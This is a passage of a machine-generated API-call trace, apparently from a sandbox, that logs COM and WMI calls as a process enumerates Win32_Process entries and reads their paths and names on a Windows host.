pToken=0x38ecc4) returned 0x0 [0213.619] IUnknown:AddRef (This=0x560cfe0) returned 0x3 [0213.619] IWbemClassObject:Get (in: This=0x560cfe0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.620] IWbemClassObject:Get (in: This=0x560cfe0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.620] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x66 [0213.620] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x66 [0213.620] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.620] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.620] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.620] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.622] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5612488) returned 0x0 [0213.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x5612488, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.622] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5612488, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x560f860) returned 0x0 [0213.622] WbemDefPath:IUnknown:Release (This=0x5612488) returned 0x0 [0213.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x560f860) returned 0x0 [0213.622] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.623] WbemDefPath:IUnknown:AddRef (This=0x560f860) returned 0x3 [0213.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5612498) returned 0x0 [0213.623] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5612498, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.623] WbemDefPath:IUnknown:Release (This=0x5612498) returned 0x3 [0213.623] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.623] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.623] WbemDefPath:IUnknown:Release (This=0x560f860) returned 0x2 [0213.623] WbemDefPath:IUnknown:Release (This=0x560f860) returned 0x1 [0213.623] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.623] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.623] WbemDefPath:IUnknown:QueryInterface (in: This=0x560f860, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x560f860) returned 0x0 [0213.623] WbemDefPath:IUnknown:AddRef (This=0x560f860) returned 0x3 [0213.623] WbemDefPath:IUnknown:Release (This=0x560f860) returned 0x2 [0213.623] WbemDefPath:IWbemPath:SetText (This=0x560f860, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2420\"") returned 0x0 [0213.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.623] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.623] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.623] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.623] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.624] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.624] IWbemClassObject:Get (in: This=0x560cfe0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2684e24*=0, plFlavor=0x2684e28*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="special avoid share.exe", varVal2=0x0), pType=0x2684e24*=8, plFlavor=0x2684e28*=0) returned 0x0 [0213.624] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0213.624] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0213.624] IWbemClassObject:Get (in: This=0x560cfe0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2684e24*=8, plFlavor=0x2684e28*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="special avoid share.exe", varVal2=0x0), pType=0x2684e24*=8, plFlavor=0x2684e28*=0) returned 0x0 [0213.624] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0213.624] SysStringByteLen (bstr="special avoid share.exe") returned 0x2e [0213.624] CoTaskMemAlloc (cb=0x4) returned 0x56124c8 [0213.624] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x56124c8, puReturned=0x267acc0 | out: apObjects=0x56124c8*=0x560d178, puReturned=0x267acc0*=0x1) returned 0x0 [0213.625] IUnknown:QueryInterface (in: This=0x560d178, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560d178) returned 0x0 [0213.625] IUnknown:QueryInterface (in: This=0x560d178, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.625] IUnknown:QueryInterface (in: This=0x560d178, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.625] IUnknown:AddRef (This=0x560d178) returned 0x3 [0213.625] IUnknown:QueryInterface (in: This=0x560d178, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.625] IUnknown:QueryInterface (in: This=0x560d178, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.625] IUnknown:QueryInterface (in: This=0x560d178, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560d17c) returned 0x0 [0213.625] IMarshal:GetUnmarshalClass (in: This=0x560d17c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.625] IUnknown:Release (This=0x560d17c) returned 0x3 [0213.625] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.625] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.626] IUnknown:QueryInterface (in: This=0x560d178, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.626] IUnknown:Release (This=0x560d178) returned 0x2 [0213.626] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.626] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.626] IUnknown:QueryInterface (in: This=0x560d178, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560d178) returned 0x0 [0213.626] IUnknown:AddRef (This=0x560d178) returned 0x4 [0213.626] IUnknown:Release (This=0x560d178) returned 0x3 [0213.626] IUnknown:Release (This=0x560d178) returned 0x2 [0213.626] CoTaskMemFree (pv=0x56124c8) [0213.626] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.626] IUnknown:AddRef (This=0x560d178) returned 0x3 [0213.626] IWbemClassObject:Get (in: This=0x560d178, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.626] IWbemClassObject:Get (in: This=0x560d178, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.626] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x66 [0213.626] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x66 [0213.627] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.627] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.627] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.627] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.627] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x56124c8) returned 0x0 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x56124c8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.628] WbemDefPath:IClassFactory:CreateInstance (in: This=0x56124c8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5619da0) returned 0x0 [0213.628] WbemDefPath:IUnknown:Release (This=0x56124c8) returned 0x0 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5619da0) returned 0x0 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.628] WbemDefPath:IUnknown:AddRef (This=0x5619da0) returned 0x3 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x56124d8) returned 0x0 [0213.628] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x56124d8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.628] WbemDefPath:IUnknown:Release (This=0x56124d8) returned 0x3 [0213.628] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.628] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.628] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.628] WbemDefPath:IUnknown:Release (This=0x5619da0) returned 0x2 [0213.628] WbemDefPath:IUnknown:Release (This=0x5619da0) returned 0x1 [0213.629] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.629] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.629] WbemDefPath:IUnknown:QueryInterface (in: This=0x5619da0, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5619da0) returned 0x0 [0213.629] WbemDefPath:IUnknown:AddRef (This=0x5619da0) returned 0x3 [0213.629] WbemDefPath:IUnknown:Release (This=0x5619da0) returned 0x2 [0213.629] WbemDefPath:IWbemPath:SetText (This=0x5619da0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x0 [0213.629] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.629] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.629] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.629] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.629] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.629] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.629] IWbemClassObject:Get (in: This=0x560d178, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26856c0*=0, plFlavor=0x26856c4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="collection.exe", varVal2=0x0), pType=0x26856c0*=8, plFlavor=0x26856c4*=0) returned 0x0 [0213.629] SysStringByteLen (bstr="collection.exe") returned 0x1c [0213.629] SysStringByteLen (bstr="collection.exe") returned 0x1c [0213.629] IWbemClassObject:Get (in: This=0x560d178, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26856c0*=8, plFlavor=0x26856c4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="collection.exe", varVal2=0x0), pType=0x26856c0*=8, plFlavor=0x26856c4*=0) returned 0x0 [0213.629] SysStringByteLen (bstr="collection.exe") returned 0x1c [0213.629] SysStringByteLen (bstr="collection.exe") returned 0x1c [0213.629] CoTaskMemAlloc (cb=0x4) returned 0x5612508 [0213.629] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5612508, puReturned=0x267acc0 | out: apObjects=0x5612508*=0x560d310, puReturned=0x267acc0*=0x1) returned 0x0 [0213.630] IUnknown:QueryInterface (in: This=0x560d310, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560d310) returned 0x0 [0213.630] IUnknown:QueryInterface (in: This=0x560d310, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.630] IUnknown:QueryInterface (in: This=0x560d310, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.631] IUnknown:AddRef (This=0x560d310) returned 0x3 [0213.631] IUnknown:QueryInterface (in: This=0x560d310, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.631] IUnknown:QueryInterface (in: This=0x560d310, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.631] IUnknown:QueryInterface (in: This=0x560d310, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560d314) returned 0x0 [0213.631] IMarshal:GetUnmarshalClass (in: This=0x560d314, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.631] IUnknown:Release (This=0x560d314) returned 0x3 [0213.631] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.631] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.631] IUnknown:QueryInterface (in: This=0x560d310, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.631] IUnknown:Release (This=0x560d310) returned 0x2 [0213.631] 